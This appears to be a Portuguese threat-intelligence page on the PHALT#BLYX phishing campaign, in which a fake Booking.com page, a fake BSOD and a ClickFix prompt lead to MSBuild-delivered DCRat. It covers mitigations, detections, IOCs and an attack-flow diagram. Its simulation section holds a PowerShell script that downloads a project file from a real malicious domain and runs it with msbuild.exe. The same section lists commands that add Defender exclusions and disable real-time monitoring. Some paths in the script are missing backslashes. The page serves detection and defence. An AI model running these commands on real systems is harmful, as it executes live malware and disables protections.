Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório detalha uma cadeia de intrusão em várias etapas que afeta o setor de hospitalidade, combinando uma página falsa de Booking.com, uma animação enganosa estilo tela azul e um prompt estilo ClickFix para persuadir os usuários a executar um PowerShell dropper. Esse dropper obtém um arquivo de projeto MSBuild, que executa um carregador DCRat personalizado. O carregador altera o Windows Defender, define persistência usando um atalho .url de Inicialização e injeta sua carga útil em processos legítimos. Ao se apoiar em utilitários living-off-the-land como PowerShell e MSBuild.exe, os operadores reduzem traços de malware óbvios. Artefatos em russo na cadeia também são notados como uma pista de atribuição.
Investigação
Os pesquisadores da Securonix mapearam o fluxo de e-mails de phishing oferecendo links de “cancelamento de reserva” a um domínio malicioso, então a uma linha única de PowerShell que localiza msbuild.exe, baixa um arquivo v.proj e o executa. O projeto v.proj realiza várias ações: adiciona exclusões no Windows Defender, baixa staxs.exe (uma variante do DCRat), cria um atalho .url de Inicialização para persistência, e conecta-se à infraestrutura de comando e controle pela porta 3535. O carregador então comprime e injeta a etapa final em aspnet_compiler.exe, usando hollowing de processo para se misturar à atividade legítima.
Mitigação
Reduza a exposição treinando os usuários para reconhecer prompts no estilo ClickFix e engenharia social de “execute este comando para corrigir”. Monitore e restrinja a execução de MSBuild.exe – especialmente quando invocado de locais incomuns ou fluxos de trabalho orientados pelo usuário – e habilite o registro de blocos de script do PowerShell para melhor visibilidade. Adicione detecções para a criação de atalhos na pasta de Inicialização e para modificações nas exclusões do Windows Defender. Na camada de rede, bloqueie o tráfego de saída para os domínios maliciosos identificados e restrinja explicitamente ou alerte sobre egressos suspeitos para o TCP/3535 onde não for necessário.
Resposta
Se a atividade for detectada, isole o host e preserve os principais artefatos, incluindo v.proj, staxs.exe, e quaisquer arquivos de Inicialização .url. Remova exclusões não autorizadas do Defender, encerre processos maliciosos ou injetados, e bloqueie domínios/IPs C2 associados – especialmente quaisquer comunicações pela porta 3535. Redefina credenciais potencialmente expostas, execute uma verificação completa de malware e analise o ambiente para padrões de execução semelhantes dirigidos por MSBuild e comandos PowerShell. Finalmente, implemente detecções informadas por inteligência de ameaças que se concentrem em abuso de MSBuild, comportamento ClickFix, e persistência via atalhos de Inicialização para evitar a recorrência.
“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef file fill:#e6e6e6 classDef folder fill:#d9ead3 %% Nodes u2013 Actions action_phishing[“<b>Ação</b> – <b>T1566.002 Spearphishing Link</b><br/><b>Descrição</b>: A vítima recebe um email que parece ser do Booking.com e clica em um link malicioso para um site de reserva falso.”] class action_phishing action action_user_execution[“<b>Ação</b> – <b>T1204.001 Execução de Usuário</b> & <b>T1204.004 Cópia-Maliciosa&Cola</b><br/><b>Descrição</b>: O site falso exibe uma página semelhante a um BSOD que instrui o usuário a colar um comando PowerShell no diálogo Executar.”] class action_user_execution action action_defense_evasion_exclusions[“<b>Ação</b> – <b>T1562 Prejudicar Defesas</b> & <b>T1564.012 Exclusões de Arquivo/Caminho</b><br/><b>Descrição</b>: O script v.proj adiciona exclusões do Windows Defender para ProgramData e extensões executáveis comuns.”] class action_defense_evasion_exclusions action action_persistence_shortcut[“<b>Ação</b> – <b>T1547.009 Modificação de Atalho</b><br/><b>Descrição</b>: Cria um Atalho de Internet (.url) na pasta de Inicialização do usuário que aponta para o executável transferido.”] class action_persistence_shortcut action action_process_hollowing[“<b>Ação</b> – <b>T1055.012 Process Hollowing</b><br/><b>Descrição</b>: Injeta a carga final do DCRat em aspnet_compiler.exe usando process hollowing.”] class action_process_hollowing action action_reflective_loading[“<b>Ação</b> – <b>T1620 Carregamento de Código Refletido</b><br/><b>Descrição</b>: Carrega cargas adicionais de DLL de forma refletida via Assembly.Load.”] class action_reflective_loading action action_c2_nonstandard_port[“<b>Ação</b> – <b>T1571 Porta Não-Padrão</b><br/><b>Descrição</b>: RAT se comunica com servidores C2 sobre a porta TCP 3535.”] class action_c2_nonstandard_port action action_c2_dynamic_resolution[“<b>Ação</b> – <b>T1568 Resolução Dinâmica</b><br/><b>Descrição</b>: Resolve múltiplos domínios C2 (e.g., asj77.com) em tempo de execução.”] class action_c2_dynamic_resolution action action_obfuscation[“<b>Ação</b> – <b>T1027.005 Arquivos ou Informações Ofuscadas</b><br/><b>Descrição</b>: As cargas úteis estão fortemente ofuscadas e empacotadas para evitar detecção estática.”] class action_obfuscation action %% Nodes u2013 Tools tool_powershell[“<b>Ferramenta</b> – <b>T1059.001 PowerShell</b><br/><b>Descrição</b>: Executa o comando malicioso que baixa o arquivo de projeto MSBuild.”] class tool_powershell tool tool_msbuild[“<b>Ferramenta</b> – <b>T1127.001 MSBuild</b><br/><b>Descrição</b>: Utilitário de desenvolvedor confiável usado para compilar e executar o arquivo v.proj malicioso.”] class tool_msbuild tool tool_aspnet_compiler[“<b>Ferramenta</b> – aspnet_compiler.exe<br/><b>Descrição</b>: Compilador .NET legítimo visado para process hollowing.”] class tool_aspnet_compiler process %% Nodes u2013 Malware / Files malware_vproj[“<b>Malware</b> – v.proj (projeto MSBuild malicioso)<br/><b>Descrição</b>: Baixado por PowerShell, compilado por MSBuild, adiciona exclusões do defensor e distribui carga útil.”] class malware_vproj malware malware_dcrat[“<b>Malware</b> – Carga Útil do DCRat<br/><b>Descrição</b>: Trojan de acesso remoto final injetado em aspnet_compiler.exe.”] class malware_dcrat malware file_shortcut[“<b>Arquivo</b> – Atalho de Inicialização (.url)<br/><b>Descrição</b>: Aponta para o executável DCRat transferido e garante execução automática no login.”] class file_shortcut file folder_startup[“<b>Pasta</b> – Diretório de Inicialização<br/><b>Descrição</b>: Contém o atalho malicioso que causa persistência.”] class folder_startup folder file_dcrat_exe[“<b>Arquivo</b> – Executável DCRat Transferido<br/><b>Descrição</b>: Executado após ativação do atalho.”] class file_dcrat_exe file dll_payloads[“<b>Arquivo</b> – Cargas de DLL Adicionais<br/><b>Descrição</b>: Carregado de forma refletida pela carga útil do DCRat.”] class dll_payloads file port_3535[“<b>Rede</b> – Porta TCP 3535<br/><b>Descrição</b>: Usada para comunicação C2.”] class port_3535 file domain_asj77[“<b>Rede</b> – asj77.com (domínio C2)<br/><b>Descrição</b>: Resolvido em tempo de execução para comando e controle.”] class domain_asj77 file %% Connections u2013 Flow action_phishing u002du002d>|leva a| action_user_execution action_user_execution u002du002d>|executa| tool_powershell tool_powershell u002du002d>|baixa| malware_vproj malware_vproj u002du002d>|compilado por| tool_msbuild tool_msbuild u002du002d>|executa| malware_vproj malware_vproj u002du002d>|adiciona| action_defense_evasion_exclusions action_defense_evasion_exclusions u002du002d>|cria| file_shortcut file_shortcut u002du002d>|colocado em| folder_startup folder_startup u002du002d>|carrega| file_dcrat_exe malware_vproj u002du002d>|distribui| file_dcrat_exe file_dcrat_exe u002du002d>|executa| malware_dcrat malware_dcrat u002du002d>|injeta em| tool_aspnet_compiler tool_aspnet_compiler u002du002d>|esvaziado por| malware_dcrat malware_dcrat u002du002d>|carrega de forma refletida| dll_payloads malware_dcrat u002du002d>|comunica-se via| action_c2_nonstandard_port action_c2_nonstandard_port u002du002d>|usa| port_3535 malware_dcrat u002du002d>|usa resolução dinâmica| action_c2_dynamic_resolution action_c2_dynamic_resolution u002du002d>|resolve para| domain_asj77 malware_dcrat u002du002d>|ofuscado por| action_obfuscation “
Fluxo do Ataque
Detecções
Download ou Upload via Powershell (via cmdline)
Ver
Alterações Suspeitas nas Preferências do Windows Defender (via powershell)
Ver
Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)
Ver
Binários / Scripts Suspeitos em Local de Inicialização (via file_event)
Ver
IOCs (HashSha512) para detectar: Analisando PHALT#BLYX: Como BSODs Falsos e Ferramentas de Build Confiáveis São Usadas para Construir uma Infecção por Malware
Ver
IOCs (SourceIP) para detectar: Analisando PHALT#BLYX: Como BSODs Falsos e Ferramentas de Build Confiáveis São Usadas para Construir uma Infecção por Malware
Ver
IOCs (HashSha256) para detectar: Analisando PHALT#BLYX: Como BSODs Falsos e Ferramentas de Build Confiáveis São Usadas para Construir uma Infecção por Malware
Ver
IOCs (DestinationIP) para detectar: Analisando PHALT#BLYX: Como BSODs Falsos e Ferramentas de Build Confiáveis São Usadas para Construir uma Infecção por Malware
Ver
PHALT#BLYX Execução Maliciosa de Carga Útil via MSBuild e Hollowing de Processo [Criação de Processo do Windows]
Ver
PHALT#BLYX Campanha de Malware Usando PowerShell e MSBuild para Infecção [Windows Powershell]
Ver
Execução da Simulação
Pré-requisito: O Check de Pré-Voo de Telemetria e Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa refletem diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção.
-
Narrativa e Comandos do Ataque:
O ator da ameaça abre uma sessão do PowerShell em um endpoint comprometido. Eles localizam primeiro omsbuild.exebinário, então baixam um projeto MSBuild malicioso (v.proj) paraC:ProgramData. O atacante imediatamente invocamsbuild.exepara executar a carga útil, que derruba um segundo estágio. Finalmente, eles alteram o Windows Defender adicionando exclusões e desativando o monitoramento em tempo real para garantir persistência. -
Script de Teste de Regressão:
# Script de simulação PHALT#BLYX – reproduz atividade de acionamento de detecção # -------------------------------------------------------------- # 1. Localize o msbuild.exe $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. Baixe o projeto MSBuild malicioso para ProgramData $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. Execute o projeto com msbuild.exe & $msb $dest # 4. Modifique as configurações do Windows Defender (qualquer uma das seguintes satisfará a regra) # Descomente as linhas desejadas para simular as ações do atacante. # Adicionar caminho de exclusão # Add-MpPreference -ExclusionPath "$env:ProgramData" # Adicionar exclusão para arquivos .exe # Add-MpPreference -ExclusionExtension ".exe" # Adicionar exclusão para arquivos .ps1 # Add-MpPreference -ExclusionExtension ".ps1" # Desabilitar monitoramento em tempo real # Set-MpPreference -DisableRealtimeMonitoring $true -
Comandos de Limpeza:
# Remover o arquivo de projeto baixado Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Restaurar monitoramento em tempo real do Windows Defender (se foi desativado) Set-MpPreference -DisableRealtimeMonitoring $false # Remover quaisquer exclusões adicionadas (exemplo para exclusão de caminho) Remove-MpPreference -ExclusionPath "$env:ProgramData" # Opcionalmente excluir quaisquer arquivos restantes criados pela carga útil # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue